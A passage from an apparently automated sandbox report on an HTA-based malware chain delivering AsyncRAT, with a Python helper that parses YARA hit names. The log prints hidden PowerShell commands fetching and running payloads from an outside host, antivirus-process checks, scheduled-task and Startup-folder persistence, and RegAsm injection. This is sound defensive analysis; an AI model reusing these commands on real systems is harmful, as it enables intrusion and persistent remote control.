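    "0000001D.00000003.3345618288.00000000038D0000.00000004.00000800.00020000.00000000.sdmp",
    "0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp",
]

# <pid>.<stage>.<image>.<hex base>.<index>[.raw].unpack ; the image name may itself
# contain dots, so it is matched lazily and the hex base must be followed by a decimal index.
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9a-fA-F]+)\.(\d+)\.(raw\.)?unpack$")
# Eight dot-separated fields. PID and stage are hex (0x1D = 29, 0x29 = 41, matching the
# unpack names above); field 3 is left opaque here.
SDMP_RE = re.compile(r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
                     r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")

# Win32 PAGE_* and MEM_* values. ASSUMPTION: field 5 is the region protection and field 7
# the region type; inferred from the values seen (0x04, 0x40, 0x20000), not documented here.
PAGE_PROTECTION = {0x01: "NOACCESS", 0x02: "READONLY", 0x04: "READWRITE", 0x08: "WRITECOPY",
                   0x10: "EXECUTE", 0x20: "EXECUTE_READ", 0x40: "EXECUTE_READWRITE",
                   0x80: "EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


def parse_unpack(ident):
    m = UNPACK_RE.match(ident)
    if not m:
        return None
    pid, stage, image, base, idx, raw = m.groups()
    return {"pid": int(pid), "stage": int(stage), "image": image,
            "base": int(base, 16), "index": int(idx), "raw": raw is not None}


def parse_sdmp(ident):
    m = SDMP_RE.match(ident)
    if not m:
        return None
    f = m.groups()
    prot = int(f[4], 16) & 0xFF            # drop PAGE_GUARD / NOCACHE modifier bits
    return {"pid": int(f[0], 16), "stage": int(f[1], 16), "base": int(f[3], 16),
            "protection": PAGE_PROTECTION.get(prot, hex(prot)),
            "executable": bool(prot & 0xF0),  # all EXECUTE* constants live in 0x10..0x80
            "type": MEM_TYPE.get(int(f[6], 16), f[6])}


def summarize(identifiers):
    """Per PID: image name (from unpack ids), distinct regions, and how many dumped
    regions were executable. A RAT rule firing on executable private memory means the
    payload runs there; firing only on read/write regions means the process carries it."""
    per_pid = defaultdict(lambda: {"image": None, "regions": set(), "executable_regions": 0})
    for ident in identifiers:
        u = parse_unpack(ident)
        if u:
            per_pid[u["pid"]]["image"] = u["image"]
            per_pid[u["pid"]]["regions"].add(u["base"])
            continue
        s = parse_sdmp(ident)
        if s:
            per_pid[s["pid"]]["regions"].add(s["base"])
            per_pid[s["pid"]]["executable_regions"] += int(s["executable"])
    return dict(per_pid)


if __name__ == "__main__":
    for pid, info in sorted(summarize(YARA_HITS).items()):
        print(pid, info["image"], len(info["regions"]), "regions,",
              info["executable_regions"], "executable")
```

              Run against the rows above this gives two processes: PID 29 (Carter.pif) with nine matching regions, all read/write, and PID 41 (RegAsm.exe) with one matching region at 0xD52000 dumped as EXECUTE_READWRITE private memory. That split is what the injection rows later in the report describe: the loader holds the AsyncRAT payload, RegAsm.exe executes it.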
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, JbeTyT6ozehDZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, GKj04XVvJiEzT5.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, JbeTyT6ozehDZJ.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 29.3.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 29.2.Carter.pif.38bceb0.1.raw.unpack, qP0JoydMkk5flJ2CzcAH0gMxtb0EV.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engine | Classification label: mal100.troj.expl.evad.winHTA@69/80@4/1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DA6AD GetLastError,FormatMessageW
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002C8DE9 AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00938DE9 AdjustTokenPrivileges,CloseHandle
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004024FB CoCreateInstance
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
              Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\c[1].bat
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9168:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8828:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\R2fsONidW19SbcLy
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
              Source: C:\Windows\SysWOW64\mshta.exe | File created: C:\Users\user\AppData\Local\Temp\temp.bat
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js"
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\f.pdf"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\msword\msword.exe msword.exe
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2052 --field-trial-handle=1648,i,6467156151985402777,10202988688681388531,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 90
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 220239
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "DimPieLilHot" Statistical
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Response + ..\Fires + ..\Automatic F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\220239\Carter.pif Carter.pif F
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & echo URL="C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url" & exit
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Process created: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wagner" /tr "wscript //B 'C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.js'" /sc minute /mo 5 /F
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr "C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr" "C:\Users\user\AppData\Local\CloudSynergy Solutions\R"
              Source: C:\Windows\System32\wscript.exe | Process created: unknown unknown
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mshtml.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msiso.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: srpapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msimtf.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msls31.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d10warp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dxcore.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msdart.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: jscript9.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
